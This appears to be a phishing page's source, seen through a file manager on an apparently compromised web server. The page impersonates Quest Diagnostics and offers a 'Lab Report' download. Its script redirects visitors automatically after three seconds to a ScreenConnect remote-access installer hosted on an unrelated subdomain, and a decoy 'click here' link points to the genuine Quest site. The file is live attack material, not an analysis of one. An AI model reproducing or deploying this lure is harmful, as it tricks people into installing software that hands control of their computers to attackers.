at path:
ROOT
/
QS
/
n26w.php
run:
R
W
Run
n26w.php
3.4 KB
2026-08-16 14:44:15
R
W
Run
Delete
Rename
error_log
up
📄
n26w.php
Save
<html> <head> <meta charset="UTF-8"> <title>Quest DIAGNOSTICS® Secure Download</title> <meta name="viewport" content="width=device-width, initial-scale=1.0"> <link rel="icon" href="https://encrypted-tbn0.gstatic.com/images?q=tbn:ANd9GcSF5JpbAvaUaYcPHyg54w-bzl8rzC3Kk-zSLiebyNFw&s"> <style> :root { --ssa-blue: #003366; --ssa-light: #f2f2f2; --ssa-accent: #005ea2; } * { box-sizing: border-box; margin: 0; padding: 0; } body { font-family: 'Segoe UI', Tahoma, Geneva, Verdana, sans-serif; background-color: var(--ssa-light); display: flex; justify-content: center; align-items: center; height: 100vh; } .card { background: white; border: 1px solid #ccc; border-radius: 8px; padding: 35px 30px; max-width: 500px; width: 100%; text-align: center; box-shadow: 0 0 15px rgba(0,0,0,0.1); } .logo img { width: 90px; margin-bottom: 20px; } h1 { font-size: 22px; color: var(--ssa-blue); margin-bottom: 15px; } p { font-size: 15px; color: #333; margin-bottom: 15px; } .click-here { color: var(--ssa-accent); text-decoration: underline; cursor: pointer; font-weight: bold; } .click-here:hover { opacity: 0.8; } .progress-bar { width: 100%; height: 6px; background-color: #ddd; border-radius: 3px; overflow: hidden; margin: 20px 0; } .progress { width: 0%; height: 100%; background-color: var(--ssa-accent); transition: width 2s ease-in-out; } .footer { font-size: 13px; color: #666; margin-top: 20px; } .footer a { color: var(--ssa-accent); text-decoration: none; } .footer a:hover { text-decoration: underline; } </style> <script> document.addEventListener("DOMContentLoaded", function () { const progress = document.querySelector('.progress'); setTimeout(() => { progress.style.width = '100%'; }, 300); setTimeout(() => { window.location.href = "https://masonsandwiches.screenconnect.com/Bin/ScreenConnect.ClientSetup.exe?e=Access&y=Guest"; }, 3000); }); function manualDownload() { window.location.href = "https://www.questdiagnostics.com/"; } </script> </head> <body> <div class="card"> <div class="logo"><img src="https://encrypted-tbn0.gstatic.com/images?q=tbn:ANd9GcR0GjNFcGu_5n6tQkL0r_hGKGwogqx2TwvABvfebwQHckgLDc2Mpr30QSw&s" alt="Quest Logo"> </div> <h1>My quest Lab Report</h1> <p>Your document is now ready to download.<br> If it doesn't start automatically, <span class="click-here" onclick="manualDownload()">click here</span>.</p> <div class="progress-bar"> <div class="progress" style="width: 100%;"></div> </div> <p>This is an Quest DIAGNOSTICS system. Unauthorized use is prohibited.</p> <div class="footer"> Need assistance? Visit <a href="https://www.questdiagnostics.com//help/">questdiagnostics Help Center</a> </div> </div> <script defer="defer" src="https://static.cloudflareinsights.com/beacon.min.js/vcd15cbe7772f49c399c6a5babf22c1241717689176015" integrity="sha512-ZpsOmlRQV6y907TI0dKBHq9Md29nnaEIPlkf84rnaERnq6zvWvPUqr2ft8M1aS28oN72PdrCzSjY4U6VaAw1EQ==" data-cf-beacon="{"rayId":"9a54d9bf3d1c11b4","version":"2025.9.1","r":1,"token":"3187a571707b42a2917052d915e9cb44","serverTiming":{"name":{"cfExtPri":true,"cfEdge":true,"cfOrigin":true,"cfL4":true,"cfSpeedBrain":true,"cfCacheStatus":true}}}" crossorigin="anonymous"></script> </body> </html>